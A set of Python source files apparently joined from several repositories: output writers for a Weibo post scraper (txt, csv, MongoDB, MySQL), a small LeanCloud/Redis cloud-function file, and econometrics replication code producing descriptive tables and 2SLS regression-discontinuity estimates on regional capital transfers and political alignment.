if type == 'img' or type == 'video':
return file_dir
file_path = file_dir + os.sep + nickname + '.' + type
return file_path
def write_log(since_date):
"""当程序因cookie过期停止运行时,将相关信息写入log.txt"""
file_dir = os.path.split(
os.path.realpath(__file__))[0] + os.sep + 'weibo' + os.sep
if not os.path.isdir(file_dir):
os.makedirs(file_dir)
file_path = file_dir + 'log.txt'
content = u'cookie已过期,从%s到今天的微博获取失败,请重新设置cookie\n' % since_date
with open(file_path, 'ab') as f:
f.write(content.encode(sys.stdout.encoding))
class Writer:
def __init__(self, config):
write_mode = config['write_mode']
self.writers = []
if 'txt' in write_mode:
self.writers.append(TxtWriter(config))
if 'csv' in write_mode:
self.writers.append(CsvWriter(config))
if 'mysql' in write_mode:
self.writers.append(MysqlWriter(config))
if 'mongo' in write_mode:
self.writers.append(MongoWriter(config))
def write_user(self, user):
for writer in self.writers:
if isinstance(writer, MongoWriter):
writer.write_user(copy.deepcopy(user))
else:
writer.write_user(user)
def write_weibo(self, weibo):
for writer in self.writers:
if isinstance(writer, MongoWriter) or isinstance(
writer, MysqlWriter):
writer.write_weibo(copy.deepcopy(weibo))
else:
writer.write_weibo(weibo)
class TxtWriter:
def __init__(self, config):
self.config = config
def write_user(self, user):
self.user = user
if self.config['filter']:
result_header = u'\n\n原创微博内容: \n'
else:
result_header = u'\n\n微博内容: \n'
result_header = (u'用户信息\n用户昵称:' + user['nickname'] + u'\n用户id: ' +
str(user['id']) + u'\n微博数: ' +
str(user['weibo_num']) + u'\n关注数: ' +
str(user['following']) + u'\n粉丝数: ' +
str(user['followers']) + result_header)
with open(get_filepath('txt', user['nickname']), 'ab') as f:
f.write(result_header.encode(sys.stdout.encoding))
def write_weibo(self, weibo):
"""将爬取的信息写入txt文件"""
temp_result = []
for w in weibo:
temp_result.append(w['content'] + '\n' + u'微博位置: ' +
w['publish_place'] + '\n' + u'发布时间: ' +
w['publish_time'] + '\n' + u'点赞数: ' +
str(w['up_num']) + u' 转发数: ' +
str(w['retweet_num']) + u' 评论数: ' +
str(w['comment_num']) + '\n' + u'发布工具: ' +
w['publish_tool'] + '\n\n')
result = ''.join(temp_result)
with open(get_filepath('txt', self.user['nickname']), 'ab') as f:
f.write(result.encode(sys.stdout.encoding))
print(u'%d条微博写入txt文件完毕,保存路径:' % len(weibo))
print(get_filepath('txt', self.user['nickname']))
class CsvWriter:
def __init__(self, config):
self.config = config
def write_user(self, user):
self.user = user
result_headers = [
'微博id',
'微博正文',
'发布位置',
'发布时间',
'发布工具',
'点赞数',
'转发数',
'评论数',
'原始图片url',
'微博视频url',
]
if not self.config['filter']:
result_headers.insert(-1, '被转发微博原始图片url')
result_headers.insert(-1, '是否为原创微博')
if sys.version < '3': # python2.x
reload(sys)
sys.setdefaultencoding('utf-8')
with open(get_filepath('csv', self.user['nickname']), 'ab') as f:
csv_writer = csv.writer(f)
csv_writer.writerows([result_headers])
else: # python3.x
with open(get_filepath('csv', self.user['nickname']),
'a',
encoding='utf-8-sig',
newline='') as f:
csv_writer = csv.writer(f)
csv_writer.writerows([result_headers])
def write_weibo(self, weibo):
"""将爬取的信息写入csv文件"""
result_data = [w.values() for w in weibo]
if sys.version < '3': # python2.x
reload(sys)
sys.setdefaultencoding('utf-8')
with open(get_filepath('csv', self.user['nickname']), 'ab') as f:
csv_writer = csv.writer(f)
csv_writer.writerows(result_data)
else: # python3.x
with open(get_filepath('csv', self.user['nickname']),
'a',
encoding='utf-8-sig',
newline='') as f:
csv_writer = csv.writer(f)
csv_writer.writerows(result_data)
print(u'%d条微博写入csv文件完毕,保存路径:' % len(weibo))
print(get_filepath('csv', self.user['nickname']))
class MongoWriter:
def __init__(self, config):
self.config = config
def info_to_mongodb(self, collection, info_list):
"""将爬取的信息写入MongoDB数据库"""
try:
import pymongo
from pymongo import MongoClient
except ImportError:
sys.exit(u'系统中可能没有安装pymongo库,请先运行 pip install pymongo ,再运行程序')
try:
client = MongoClient()
except pymongo.errors.ServerSelectionTimeoutError:
sys.exit(u'系统中可能没有安装或启动MongoDB数据库,请先根据系统环境安装或启动MongoDB,再运行程序')
db = client['weibo']
collection = db[collection]
for info in info_list:
if not collection.find_one({'id': info['id']}):
collection.insert_one(info)
else:
collection.update_one({'id': info['id']}, {'$set': info})
def write_user(self, user):
"""将爬取的用户信息写入MongoDB数据库"""
self.user = user
user_list = [user]
self.info_to_mongodb('user', user_list)
print(u'%s信息写入MongoDB数据库完毕' % user['nickname'])
def write_weibo(self, weibo):
"""将爬取的微博信息写入MongoDB数据库"""
weibo_list = []
for w in weibo:
w['user_id'] = self.user['id']
weibo_list.append(w)
self.info_to_mongodb('weibo', weibo_list)
print(u'%d条微博写入MongoDB数据库完毕' % len(weibo))
class MysqlWriter:
def __init__(self, config):
self.config = config
def write_user(self, user):
"""将爬取的用户信息写入MySQL数据库"""
self.user = user
# 创建'weibo'数据库
create_database = """CREATE DATABASE IF NOT EXISTS weibo DEFAULT
CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci"""
self.mysql_create_database(create_database)
# 创建'user'表
create_table = """
CREATE TABLE IF NOT EXISTS user (
id varchar(12) NOT NULL,
nickname varchar(30),
weibo_num INT,
following INT,
followers INT,
PRIMARY KEY (id)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4"""
self.mysql_create_table(create_table)
self.mysql_insert('user', [user])
print(u'%s信息写入MySQL数据库完毕' % user['nickname'])
def write_weibo(self, weibo):
"""将爬取的微博信息写入MySQL数据库"""
# 创建'weibo'表
create_table = """
CREATE TABLE IF NOT EXISTS weibo (
id varchar(10) NOT NULL,
user_id varchar(12),
content varchar(2000),
original_pictures varchar(1000),
retweet_pictures varchar(1000),
original BOOLEAN NOT NULL DEFAULT 1,
video_url varchar(300),
publish_place varchar(100),
publish_time DATETIME NOT NULL,
publish_tool varchar(30),
up_num INT NOT NULL,
retweet_num INT NOT NULL,
comment_num INT NOT NULL,
PRIMARY KEY (id)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4"""
self.mysql_create_table(create_table)
# 在'weibo'表中插入或更新微博数据
weibo_list = []
for w in weibo:
w['user_id'] = self.user['id']
weibo_list.append(w)
self.mysql_insert('weibo', weibo_list)
print(u'%d条微博写入MySQL数据库完毕' % len(weibo))
def mysql_create(self, connection, sql):
"""创建MySQL数据库或表"""
try:
with connection.cursor() as cursor:
cursor.execute(sql)
finally:
connection.close()
def mysql_create_database(self, sql):
"""创建MySQL数据库"""
try:
import pymysql
except ImportError:
sys.exit(u'系统中可能没有安装pymysql库,请先运行 pip install pymysql ,再运行程序')
mysql_config = self.config['mysql_config']
try:
connection = pymysql.connect(**mysql_config)
except pymysql.err.OperationalError:
sys.exit(u'系统中可能没有安装或启动MySQL数据库或配置错误,请先根据系统环境安装或启动MySQL,再运行程序')
self.mysql_create(connection, sql)
def mysql_create_table(self, sql):
"""创建MySQL表"""
import pymysql
mysql_config = self.config['mysql_config']
mysql_config['db'] = 'weibo'
connection = pymysql.connect(**mysql_config)
self.mysql_create(connection, sql)
def mysql_insert(self, table, data_list):
"""向MySQL表插入或更新数据"""
import pymysql
mysql_config = self.config['mysql_config']
if len(data_list) > 0:
keys = ', '.join(data_list[0].keys())
values = ', '.join(['%s'] * len(data_list[0]))
mysql_config['db'] = 'weibo'
connection = pymysql.connect(**mysql_config)
cursor = connection.cursor()
sql = """INSERT INTO {table}({keys}) VALUES ({values}) ON
DUPLICATE KEY UPDATE""".format(table=table,
keys=keys,
values=values)
update = ','.join([
" {key} = values({key})".format(key=key)
for key in data_list[0]
])
sql += update
try:
cursor.executemany(
sql, [tuple(data.values()) for data in data_list])
connection.commit()
except Exception as e:
connection.rollback()
print('Error: ', e)
traceback.print_exc()
finally:
connection.close()
``` |
{
"source": "jinjunnn/cloud1",
"score": 3
} |
#### File: jinjunnn/cloud1/cloud.py
```python
from leancloud import Engine
from leancloud import LeanEngineError
engine = Engine()
import os
import redis
r = redis.from_url(os.environ.get("REDIS_URL_impharaon"))
@engine.define
def write_users(**params):
#这段代码是将空值数据过滤
data_info = params
for key in list(data_info.keys()):
if not data_info.get(key):
data_info.pop(key)
result = r.hmset(params['id'],data_info)
#12345
print(result)
@engine.define
def write_users_sent_message_times(**params):
r.hmset('test','key','value')
#这个是删除所有的redis的key
@engine.define
def del_all_redis_key():
keys = r.keys('*')
for item in keys:
r.delete(item)
@engine.before_save('Todo')
def before_todo_save(todo):
content = todo.get('content')
if not content:
raise LeanEngineError('Content cannot be empty!')
if len(content) >= 240:
todo.set('content', content[:240] + ' ...')
``` |
{
"source": "jinju-rhee/microeconometrics_replication",
"score": 2
} |
#### File: microeconometrics_replication/auxiliary/auxiliary_tables.py
```python
from localreg import *
import pandas as pd
import numpy as np
import econtools
import econtools.metrics as mt
from auxiliary.auxiliary_subset import *
from auxiliary.auxiliary_tables import *
##===============================
## For descriptive statistics table
def descriptive_main(data):
variables = data[["tk","ab","dist1","ecs1"]]
table = pd.DataFrame()
mean = variables.mean()
table['Mean'] = mean.round(2)
table['Standard Deviation'] = variables.std()
table = table.astype(float).round(2)
table['Variable'] = ["Capital transfers","Alignment","Regional incumbent’s bloc vote margin (v)", "Regional seat margin"]
table = table.set_index('Variable')
table['RDD frame'] = ["outcome variable","treatment","forcing variable","heterogeneity effects"]
table['Definition'] = ["Capital transfers from the Regional government per capita",
"Dummy equal to one if the party of the mayor is the same as that of the president of the AC",
"% of votes cast at the local elections that have to be added (subtracted from) to the ideological bloc of the Regional incumbent to win (lose) a majority of seats in the local council",
"Difference between the seat share of the parties in the regional government and the seat share of the main opposition parties in the previous regional election. This variable is demeaned. "]
table.style.set_properties(subset= ['Definition'], **{'width-min': '300px'})
return(table)
def descriptive_controls(data):
variables = data[["debt","tipo","vcp","pob","density","pob_mes6591","pob_5_1491",
"extr_noeu91","unempl","income","educ2","presscirc","regre",
"regde","meanden","regterm"]]
table = pd.DataFrame()
mean = variables.mean()
table['Mean'] = mean.round(2)
table['Standard Deviation'] = variables.std()
table = table.astype(float).round(2)
table['Variable'] = ["Debt burden","Property tax rate","Property value", "Population","Population density","% Old",
"% Young","% Immigrant","% Unemployed","Income indicator","% Educated","Press circulation",
"Regional revenues pc","Regional debt","Municipal density","Tenure in office"]
table = table.set_index('Variable')
table['Definition'] = ["Debt burden (capital, item 9 of the spending budget, + interest, item 3), as a share of current revenues",
"Nominal property tax rate (IBI), % on assessed property value",
"Assessed property value (thousands of EUR) per capita",
"Resident population",
"Population per square kilometer",
"% resident population older than 65 years",
"% resident population younger than 14 years",
"% resident population non-EU immigrant",
"% resident population unemployed",
"Residents’ income level, as estimated from objective indicators (e.g., cars, bank deposits, etc.)",
"Percentage of people with primary and secondary education. This variable is demeaned",
"Newspaper copies (at the province level) per 1000 inhabitants. This variable is demeaned",
"Current revenues per capita in each region. This variable is demeaned",
"Debt burden (capital, item 9 of the spending budget, + interest, item 3) as a share of current revenues. This variable is demeaned",
"Average population density (population per square kilometer) of the municipalities in each region. This variable is demeaned",
"Dummy equal to one if it is the regional incumbent was not in office the previous term"]
table.style.set_properties(subset= ['Definition'], **{'width-min': '300px'})
return(table)
def descriptive_confounders(data):
variables = data[["ecs1","regre","regde","meanden","regterm","presscirc","educ2"]]
table1 = pd.DataFrame()
table1['Mean'] = variables.mean()
table1['Standard Deviation'] = variables.std()
table1 = table1.astype(float).round(2)
table1['Confounders'] = ["Regional seat margin","Regional revenues pc","Regional debt", "Municipal density",
"Tenure in office","Press circulation","% Educated"]
table1 = table1.set_index('Confounders')
table1['Definition'] = ["Gap btw the seat share of the parties in the regional government and the opposition parties",
"Current revenues per capita in each region",
"Debt burden as a share of current revenues",
"Average population density (population per km^2) of the municipalities in each region",
"Dummy equal to one if it is the regional incumbent was not in office the previous term",
"Newspaper copies (at the province level) per 1000 inhabitants",
"Percentage of people with primary and secondary education"]
table1 = table1.round(2).style.set_properties(subset= ['Definition'], **{'width-min': '300px'})
table1
##===============================
## For table 1
def first_stage_2SLS_global(data,cluster_var,covariates):
# cluster_var = codiine -> for the coefficient
# cluster_var = codccaa -> for the p_value
df = data[["ab","dab","dist1","dist2","vda","vda2","codiine","codccaa",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15","lpob", "density", "debt", "vcp", "tipo"]]
y = 'ab'
X = ['dab', 'dist1', 'dist2', 'vda','vda2',
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"]
if covariates == 1:
X = X + ["lpob", "density", "debt", "vcp", "tipo"]
elif covariates == 0:
X = X
results = mt.reg(
df, # DataFrame
y, # Dependent var (string)
X, # Independent var(s) (string or list of strings)
cluster=cluster_var, # Cluster var (string)
addcons=True
)
return(results)
def first_stage_2SLS_local(data,bandwidth,cluster_var,covariates):
# calculated optimal bandwidth:
# 2h* = 0.386
# h* = 0.193
# h*/2 = 0.0965
# h*/4 = 0.048
df = data[["ab","dab","dist1","dist2","vda","vda2","codiine","codccaa",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15","lpob", "density", "debt", "vcp", "tipo"]]
df_h = df[abs(df.dist1)<bandwidth]
y = 'ab'
X = ['dab', 'dist1', 'vda',
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"]
if covariates == 1:
X = X + ["lpob", "density", "debt", "vcp", "tipo"]
elif covariates == 0:
X = X
results = mt.reg(
df_h, # DataFrame
y, # Dependent var (string)
X, # Independent var(s) (string or list of strings)
cluster=cluster_var, # Cluster var (string)
addcons=True
)
return(results)
def second_stage_2SLS_global(data,cluster_var,covariates):
df = data[["ab","dab","dist1","dist2","vsa","vsa2","vda","vda2","tk",
"codiine","codccaa",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15","lpob", "density", "debt", "vcp", "tipo"]]
y = "tk" # dependent var
E = ["ab","vsa","vsa2"] # endo reg
Z = ["dab","vda","vda2"] # instrumental
X = ["dist1","dist2",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"] # exo reg
if covariates == 1:
X = X + ["lpob", "density", "debt", "vcp", "tipo"]
elif covariates == 0:
X = X
results = mt.ivreg(df, y, E, Z, X, cluster=cluster_var, addcons=True)
return(results)
def second_stage_2SLS_global_codiine(data,covariates):
df = data[["ab","dab","dist1","dist2","vsa","vsa2","vda","vda2","tk",
"codiine","codccaa",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15","lpob", "density", "debt", "vcp", "tipo"]]
y = "tk" # dependent var
E = ["ab","vsa","vsa2"] # endo reg
Z = ["dab","vda","vda2"] # instrumental
X = ["dist1","dist2",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"] # exo reg
if covariates == 1:
X = X + ["lpob", "density", "debt", "vcp", "tipo"]
elif covariates == 0:
X = X
results = mt.ivreg(df, y, E, Z, X, cluster='codiine', addcons=True)
return(results)
def second_stage_2SLS_global_codccaa(data,covariates):
df = data[["ab","dab","dist1","dist2","vsa","vsa2","vda","vda2","tk",
"codiine","codccaa",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15","lpob", "density", "debt", "vcp", "tipo"]]
y = "tk" # dependent var
E = ["ab","vsa","vsa2"] # endo reg
Z = ["dab","vda","vda2"] # instrumental
X = ["dist1","dist2",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"] # exo reg
if covariates == 1:
X = X + ["lpob", "density", "debt", "vcp", "tipo"]
elif covariates == 0:
X = X
results = mt.ivreg(df, y, E, Z, X, cluster='codccaa', addcons=True)
return(results)
def second_stage_2SLS_local(data,bandwidth,cluster_var,covariates):
# calculated optimal bandwidth:
# 2h* = 0.386
# h* = 0.193
# h*/2 = 0.0965
# h*/4 = 0.048
df = data[["ab","dab","dist1","dist2","vsa","vsa2","vda","vda2","tk",
"codiine","codccaa",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15","lpob", "density", "debt", "vcp", "tipo"]]
df_h = df[abs(df.dist1)<bandwidth]
y = "tk" # dependent var
E = ["ab","vsa"] # endo reg
Z = ["dab","vda"] # instrumental
X = ["dist1",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"] # exo reg
if covariates == 1:
X = X + ["lpob", "density", "debt", "vcp", "tipo"]
elif covariates == 0:
X = X
results = mt.ivreg(df_h, y, E, Z, X, cluster=cluster_var,addcons=True)
return(results)
def table1(data,covariates):
table = pd.DataFrame({'2nd_stage': [], 'Std.err(2)': [], 'P-Value(2)': [],
'1st_stage': [], 'Std.err(1)': [], 'P-Value(1)': [],
'Observations': []})
case = ('Global','Local(bd=2h*)','Local(bd=h*)','Local(bd=h*/2)','Local(bd=h*/4)')
table['RD'] = case
table = table.set_index('RD')
#Global estimate
r1 = first_stage_2SLS_global(data,cluster_var = "codiine", covariates = covariates)
p1 = first_stage_2SLS_global(data,cluster_var = "codccaa", covariates = covariates)
#r2 = second_stage_2SLS_global(data,cluster_var = "codiine", covariates = covariates)
r2 = second_stage_2SLS_global_codiine(data,covariates= covariates)
#p2 = second_stage_2SLS_global(data,cluster_var = "codccaa", covariates = covariates)
p2 = second_stage_2SLS_global_codccaa(data,covariates= covariates)
rg = [r2.beta['ab'] ,r2.se['ab'], p2.pt['ab'],
r1.beta['dab'], r1.se['dab'], p1.pt['dab'], r2.N]
table.loc["Global"] = rg
#Local estimates
local = ('Local(bd=2h*)','Local(bd=h*)','Local(bd=h*/2)','Local(bd=h*/4)')
for a in local:
if a == 'Local(bd=2h*)':
bandwidth = 0.386
elif a == 'Local(bd=h*)':
bandwidth = 0.193
elif a == 'Local(bd=h*/2)':
bandwidth = 0.0965
elif a == 'Local(bd=h*/4)':
bandwidth = .048
rslt1 = first_stage_2SLS_local(data,bandwidth = bandwidth,cluster_var = "codiine", covariates = covariates)
pval1 = first_stage_2SLS_local(data,bandwidth = bandwidth,cluster_var = "codccaa", covariates = covariates)
rslt2 = second_stage_2SLS_local(data, bandwidth = bandwidth,cluster_var = "codiine", covariates = covariates)
pval2 = second_stage_2SLS_local(data, bandwidth = bandwidth,cluster_var = "codiine", covariates = covariates)
result = [rslt2.beta['ab'] , rslt2.se['ab'], pval2.pt['ab'],
rslt1.beta['dab'], rslt1.se['dab'], pval1.pt['dab'], rslt2.N]
table.loc[a] = result
return table
##===============================
## For table 2
def effect_of_competition_global(data):
dca_abi = []
dca_vsai = []
dca_2vsai = []
dca_dabi = []
dca_vdai = []
dca_2vdai = []
for i in range(1,16):
dca_abi.append("dca_ab"+str(i))
dca_vsai.append("dca_vsa"+str(i))
dca_2vsai.append("dca_2vsa"+str(i))
dca_dabi.append("dca_dab"+str(i))
dca_vdai.append("dca_vda"+str(i))
dca_2vdai.append("dca_2vda"+str(i))
regional_columns = dca_abi + dca_vsai + dca_2vsai + dca_dabi + dca_vdai + dca_2vdai
other_columns = ["ab","dab","dist1","dist2","ecs1","vsa","vsa2","vda","vda2","tk","codiine",
"codccaa","esas1","vsa_ecs1", "vsa2_ecs1","edas1","vda_ecs1", "vda2_ecs1",
"dist1_ecs1", "dist2_ecs1",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"]
rc = data[regional_columns]
oc = data[other_columns]
df = pd.concat([rc,oc], axis=1).reindex(rc.index)
y = "tk" # dependent var
e = dca_abi + dca_vsai + dca_2vsai
e_ = ["esas1", "vsa_ecs1", "vsa2_ecs1"]
E = e + e_ # endo reg
z = dca_dabi + dca_vdai + dca_2vdai
z_ = ["edas1", "vda_ecs1", "vda2_ecs1"]
Z = z + z_ # instrumental
X = ["dist1_ecs1", "dist2_ecs1", "dist1", "dist2", "ecs1",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"]
cluster_var = 'codccaa'
results = mt.ivreg(df, y, E, Z, X, cluster=cluster_var,addcons=True)
return(results)
def effect_of_competition_local(data, bandwidth):
dca_abi = []
dca_vsai = []
dca_dabi = []
dca_vdai = []
for i in range(1,16):
dca_abi.append("dca_ab"+str(i))
dca_vsai.append("dca_vsa"+str(i))
dca_dabi.append("dca_dab"+str(i))
dca_vdai.append("dca_vda"+str(i))
regional_columns = dca_abi + dca_vsai + dca_dabi + dca_vdai
other_columns = ["ab","dab","dist1","dist2","ecs1","vsa","vsa2","vda","vda2","tk","codiine",
"codccaa","esas1","vsa_ecs1", "vsa2_ecs1","edas1","vda_ecs1", "vda2_ecs1",
"dist1_ecs1", "dist2_ecs1",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"]
rc = data[regional_columns]
oc = data[other_columns]
df = pd.concat([rc,oc], axis=1).reindex(rc.index)
df_h = df[abs(df.dist1)<bandwidth]
y = "tk" # dependent var
e = dca_abi + dca_vsai
e_ = ["esas1", "vsa_ecs1"]
E = e + e_ # endo reg
z = dca_dabi + dca_vdai
z_ = ["edas1", "vda_ecs1"]
Z = z + z_ # instrumental
X = ["dist1_ecs1","dist1","ecs1",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"]
cluster_var = 'codccaa'
results = mt.ivreg(df_h, y, E, Z, X, cluster=cluster_var,addcons=True)
return(results)
def table2(data):
table = pd.DataFrame({'Alignment * RSM': [], 'Std.err(2)': [], 'P-Value(2)': [],
'RSM': [], 'Std.err(1)': [], 'P-Value(1)': [],
'Observations': []})
case = ('Global','Local(bd=2h*)','Local(bd=h*)','Local(bd=h*/2)','Local(bd=h*/4)')
table['RD'] = case
table = table.set_index('RD')
#Global
r1 = effect_of_competition_global(data)
rg = [r1.beta['esas1'] , r1.se['esas1'], r1.pt['esas1'],
r1.beta['ecs1'], r1.se['ecs1'], r1.pt['ecs1'], r1.N]
table.loc["Global"] = rg
#Local
local = ('Local(bd=2h*)','Local(bd=h*)','Local(bd=h*/2)','Local(bd=h*/4)')
for a in local:
if a == 'Local(bd=2h*)':
bandwidth = 0.386
elif a == 'Local(bd=h*)':
bandwidth = 0.193
elif a == 'Local(bd=h*/2)':
bandwidth = 0.0965
elif a == 'Local(bd=h*/4)':
bandwidth = .048
rslt1 = effect_of_competition_local(data,bandwidth = bandwidth)
result = [rslt1.beta['esas1'] , rslt1.se['esas1'], rslt1.pt['esas1'],
rslt1.beta['ecs1'], rslt1.se['ecs1'], rslt1.pt['ecs1'],rslt1.N]
table.loc[a] = result
return table
##===============================
## For table 4
def time_varying_covariates(data, add_columns, add_endo, add_inst ):
dca_abi = []
dca_vsai = []
dca_dabi = []
dca_vdai = []
for i in range(1,16):
dca_abi.append("dca_ab"+str(i))
dca_vsai.append("dca_vsa"+str(i))
dca_dabi.append("dca_dab"+str(i))
dca_vdai.append("dca_vda"+str(i))
regional_columns = dca_abi + dca_vsai + dca_dabi + dca_vdai
other_columns = ["ab","dab","dist1","ecs1","vsa","vda","tk","codiine",
"codccaa","esas1","vsa_ecs1", "edas1","vda_ecs1",
"dist1_ecs1",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"]
all_other_columns = other_columns + add_columns
rc = data[regional_columns]
oc = data[all_other_columns]
df = pd.concat([rc,oc], axis=1).reindex(rc.index)
df_h = df[abs(df.dist1)<0.193]
y = "tk" # dependent var
e = dca_abi + dca_vsai
e_ = ["esas1", "vsa_ecs1"]
E = e + e_ + add_endo # endogenous regressor
z = dca_dabi + dca_vdai
z_ = ["edas1", "vda_ecs1"]
Z = z + z_ + add_inst # instrumental variables
X = ["dist1_ecs1","dist1","ecs1",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"]#exogeneous regressor
cluster_var = 'codccaa'
results = mt.ivreg(df_h, y, E, Z, X, cluster=cluster_var,addcons=True)
return(results)
def time_varying_covariates_all(data, bandwidth):
dca_abi = []
dca_vsai = []
dca_dabi = []
dca_vdai = []
for i in range(1,16):
dca_abi.append("dca_ab"+str(i))
dca_vsai.append("dca_vsa"+str(i))
dca_dabi.append("dca_dab"+str(i))
dca_vdai.append("dca_vda"+str(i))
regional_columns = dca_abi + dca_vsai + dca_dabi + dca_vdai
other_columns = ["ab","dab","dist1","ecs1","vsa","vda","tk","codiine",
"codccaa","esas1","vsa_ecs1", "edas1","vda_ecs1",
"dist1_ecs1",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"]
add_endo = ["resa","desa","denssa","termssa","presssa","educ2sa",
"vsa_re","vsa_de","vsa_dens","vsa_te","vsa_pr","vsa_edu"]
add_inst = ["reda","deda","densda","termsda","pressda","educ2da",
"vda_re","vda_de","vda_dens","vda_te","vda_pr","vda_edu"]
all_other_columns = other_columns + add_endo + add_inst
rc = data[regional_columns]
oc = data[all_other_columns]
df = pd.concat([rc,oc], axis=1).reindex(rc.index)
df_h = df[abs(df.dist1)<bandwidth]
y = "tk" # dependent var
e = dca_abi + dca_vsai
e_ = ["esas1", "vsa_ecs1"]
E = e + e_ + add_endo# endo reg
z = dca_dabi + dca_vdai
z_ = ["edas1", "vda_ecs1"]
Z = z + z_ + add_inst # instrumental
X = ["dist1_ecs1","dist1","ecs1",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"]#exo var
cluster_var = 'codccaa'
results = mt.ivreg(df_h, y, E, Z, X, cluster=cluster_var,addcons=True)
return(results)
def table4(data):
table = pd.DataFrame({'(1)': [], '(2)': [], '(3)': [],
'(4)': [], '(5)': [], '(6)': [],
'(7)': []})
case = ('Alig * Reg. seat margin','standard error(0)','p-value(0)',
'Alig * Revenue','standard error(1)','p-value(1)',
'Alig * Debt','standard error(2)','p-value(2)',
'Alig * Population density','standard error(3)','p-value(3)',
'Alig * Tenure in Office','standard error(4)','p-value(4)',
'Alig * Press', 'standard error(5)','p-value(5)',
'Alig * Educated(%)', 'standard error(6)','p-value(6)',
'Reg. seat margin', 'standard error(7)','p-value(7)',
'Observations')
table['Covariates'] = case
table = table.set_index('Covariates')
# build the contents of table
endo_1 = ["resa","vsa_re"]
inst_1 = ["reda","vda_re"]
colu_1 = endo_1 + inst_1
rslt1 = time_varying_covariates(data, colu_1, endo_1 , inst_1)
endo_2 = ["desa","vsa_de"]
inst_2 = ["deda","vda_de"]
colu_2 = endo_2 + inst_2
rslt2 = time_varying_covariates(data, colu_2, endo_2 , inst_2)
endo_3 = ["denssa","vsa_dens"]
inst_3 = ["densda","vda_dens"]
colu_3 = endo_3 + inst_3
rslt3 = time_varying_covariates(data, colu_3, endo_3 , inst_3)
endo_4 = ["termssa","vsa_te"]
inst_4 = ["termsda","vda_te"]
colu_4 = endo_4 + inst_4
rslt4 = time_varying_covariates(data, colu_4, endo_4 , inst_4)
endo_5 = ["presssa","vsa_pr"]
inst_5 = ["reda","vda_pr"]
colu_5 = endo_5 + inst_5
rslt5 = time_varying_covariates(data, colu_5, endo_5 , inst_5)
endo_6 = ["educ2sa","vsa_edu"]
inst_6 = ["educ2da","vda_edu"]
colu_6 = endo_6 + inst_6
rslt6 = time_varying_covariates(data, colu_6, endo_6 , inst_6)
rslt7 = time_varying_covariates_all(data,bandwidth = 0.193)
# fill the table with the contents
table['(1)'] = [rslt1.beta['esas1'], rslt1.se['esas1'], rslt1.pt['esas1'],
rslt1.beta['resa'], rslt1.se['resa'], rslt1.pt['resa'],
' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',
rslt1.beta['ecs1'], rslt1.se['ecs1'], rslt1.pt['ecs1'],rslt1.N]
table['(2)'] = [rslt2.beta['esas1'], rslt2.se['esas1'], rslt2.pt['esas1'],
' ',' ',' ',rslt2.beta['desa'], rslt2.se['desa'], rslt2.pt['desa'],
' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',
rslt2.beta['ecs1'], rslt2.se['ecs1'], rslt2.pt['ecs1'],rslt2.N]
table['(3)'] = [rslt3.beta['esas1'], rslt3.se['esas1'], rslt3.pt['esas1'],
' ',' ',' ',' ',' ',' ',rslt3.beta['denssa'], rslt3.se['denssa'], rslt3.pt['denssa'],
' ',' ',' ',' ',' ',' ',' ',' ',' ',
rslt3.beta['ecs1'], rslt3.se['ecs1'], rslt3.pt['ecs1'],rslt3.N]
table['(4)'] = [rslt4.beta['esas1'], rslt4.se['esas1'], rslt4.pt['esas1'],
' ',' ',' ',' ',' ',' ',' ',' ',' ',
rslt4.beta['termssa'], rslt4.se['termssa'], rslt4.pt['termssa'],
' ',' ',' ',' ',' ',' ',
rslt4.beta['ecs1'], rslt4.se['ecs1'], rslt4.pt['ecs1'],rslt4.N]
table['(5)'] = [rslt5.beta['esas1'], rslt5.se['esas1'], rslt5.pt['esas1'],
' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',
rslt5.beta['presssa'], rslt5.se['presssa'], rslt5.pt['presssa'],' ',' ',' ',
rslt5.beta['ecs1'], rslt5.se['ecs1'], rslt5.pt['ecs1'],rslt5.N]
